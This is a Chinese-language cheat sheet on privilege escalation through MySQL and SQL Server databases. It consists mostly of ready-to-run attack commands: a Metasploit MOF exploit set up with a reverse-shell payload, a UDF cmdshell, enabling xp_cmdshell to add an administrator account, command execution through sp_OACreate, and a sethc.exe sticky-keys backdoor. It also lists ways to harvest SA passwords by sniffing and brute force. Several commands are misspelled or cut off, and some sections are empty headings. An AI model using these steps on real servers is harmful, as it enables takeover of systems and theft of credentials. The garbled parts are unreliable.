数据库提权

1 Mysql数据库漏洞提权

一般Mysql数据库经常使用php进行连接，会有较少的情况使用jsp,python等
Mysql连接文件一般为conn.php、config.php、common.inc.php、config.inc.php等
所说的mysql权限提升一般在root权限下

1.1 数据库查询

select Host,user,password from mysql.user #需要有root权限

1.2 配置文件读取

网站源码泄露情况主要以程序员上传代码到git等开源平台或更新代码时未删除备份文件(.svn .git .bak),以及运维人员打包源代码到网站服务器（www.rar等）。

user.frm
user.MYD
user.MYI

1.3 下载user文件

user文件在mysql的data目录下

select @@basedir 　　　　　　　　　#当前数据库地址
select @@plugin_dir 　　　　　　　　#>5.1

2 提权实战

2.1 Mof(托管对象格式）

提权c:/windows/system32/wbem/mof/

use exploit/windows/mysql/mysql_mof

set password xxx

set username xxx

set rhost xxx

set rport xxx

set payload windows/shell_reverse_tcp

set lhost xxx

set lport xxx

exploit

2.2 Udf（用户定义函数）提权

导出C:\windows\udf.dll

Create Function cmdshell returns string soname 'udf.dll';

select cmdshell('whoami')

drop function cmdshell

2 Sql Server 漏洞利用与提权

2.1 SA口令获取方法

2.1.1. Webshell或源码获取
一般在网站的配置文件中有存放明文账号密码，常用配置文件名如：

conn.aspx
config.aspx
config.php
web.config
.........

一般格式如：

server=localhost;
UID=sa;
PWD=shadowflow

2.1.2源代码泄露
网站源码泄露情况主要以程序员上传代码到git等开源平台或更新代码时未删除备份文件(.svn、.git、.bak），以及运维人员打包源代码到网站服务器(www.rar等）。
2.1.3嗅探
在局域网中使用cain等工具进行arp嗅探的时候可以抓取到1433端口的数据库明文登陆密码
2.1.4口令暴力破解
利用mssql暴力破解工具对mssql进行暴力破解，一旦成功将获得sa相应权限

2.2 常用SQL Server提权语句

查看数据库版本
select @@version
查看数据库系统参数
exec master..xp_msver;
查看用户所属角色信息
sp_helpsrvrolemember
查看当前数据库
select db_name()
显示机器上的驱动器
xp_availablemedia

查看当前账户权限
select IS_SRVROLEMEMBER('sysadmin') #判断是否为sa权限
类似serveradmin,setupadmin,securityadmin,diskadmin,bulkadmin

select IS_MEMBER('db_owner') #判断是否为dbo权限

添加用户
exec master.dbo.sp_addlogin test,password #添加用户
exec master.dbo.sp_addsrvrolemember test,sysadmin #加权限
启动停止服务
exec master..xp_servicecontrol 'stop','test'
exec master..xp_servicecontrol 'start','test'
检查功能
SELECT count(*）FROM master.dbo.sysobjects WHERE name='xp_cmdshell'
xp_cmdshell, xpregread,sp_makewebtask,xp_subdirs,xp_dirtree, sp_addextendedproc

xp_cmdshell

开启xp_cmdshell存储过程
EXEC sp_configure 'show advanced options',1;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell',1;RECONFIGURE;
关闭xp_cmdshell存储过程
EXEC sp_configure 'show advanced options', 1, RECONFIGURE;
EXEDC sp_configure 'xp_cmdshell',0;RECONFIGURE;
xp_cmdshell执行命令
exec master..xp_cmdshell 'ver'
exec master.dbo.xp_cmdshell 'net localgroup administrators test /add'
恢复xp_cmdshell

exec sp_dropextendedproc 'xp_cmdshell'
dbcc addextendedproc ("xp_cmdshell","xplog70.dll) OR
dbcc addextendedproc ("xp_cmdshell","d:\Program Files\Microsoft SQL Server\MSSQL\Binn\xplog70.dll");EXEC sp_configure 'show advanced options', 0 --

sp_OACreate

开启sp_OACreate
exec sp_configure 'show advanced options', 1;RECONFIGURE;
exec sp_configure 'Ola Automation Procedures' , 1;RECONFIGURE;
关闭sp_OACreate
exec sp_configure 'show advanced options',1;RECONFIGURE;
exec sp_configure 'Ole Automation Procedures',0;RECONFIGURE;
禁用advanced options
EXEC sp_configure 'show advanced options',0;GO RECONFIGURE;
sp_OACreate执行命令

1.DECLARE @js int
1.EXEC sp_OACreate 'ScriptControl',@js OUT
3.EXEC sp_OASetProperty @js,'Language','JavaScript'
4.ActiveXObject("Shell.Users");z=o.create("user");z.changePassword("pass","");z.setting("AccountType")=3;'

sp_OACreate移动文件
declare @aa int
exec sp_oacreate 'scripting.filesystemobject' @aa out
exec sp_oamethod @aa, 'moveFile',null,'c:\temp\ipmi.log','c:\temp\ipmi1.log';
sp_OACreate复制文件

declare @o int

exec sp_oacreate 'scripting.filesystemobject', @o out

exec sp_oamethod @o,'copyfile',null,'c:\windows\explorer.exe','c:\windows\system32\sethc.exe';

7.sp_OACreate删除文件

DECLARE @Result int

DECLARE @FSO_Token int

EXEC @Result = sp_OACreate 'Scripting.FileSystemObject', @FSO_Token OUTPUT

EXEC @Result = sp_OAMethod @FSO_Token, 'DeleteFile',NULL,'c:\Documents and Settings\All Users\ [开始] 菜单\程序\启动\user.bat'

EXEC @Result = sp_OADestrop @FSO_Token

wscript.shell执行命令
Shell.Application执行命令
sp_oacreate 替换粘贴键

沙盒执行命令

openrowset开启
openrowset关闭
3.沙盒执行命令

注册表篡改

注册表劫持粘贴键

sql server提权总结

总结.PNG

sa权限下

存在xp_cmdshell时
使用xp_cmdshell执行命令添加用户，当出现错误可以恢复和开启xp_cmdshell

xp_cmdshell无法使用时
使用sp_OACreate执行命令，同样当出现错误可以恢复和开启

当执行命令无法使用时可以用沙盒提权 (使用xp_regwrite和openrowset)

当只有xp_regwrite可用时可以劫持粘滞键（sethc.exe)
使用xp_regwrite修改注册表

db_owner权限下

备份到网站目录
通过备份文件到启动项提权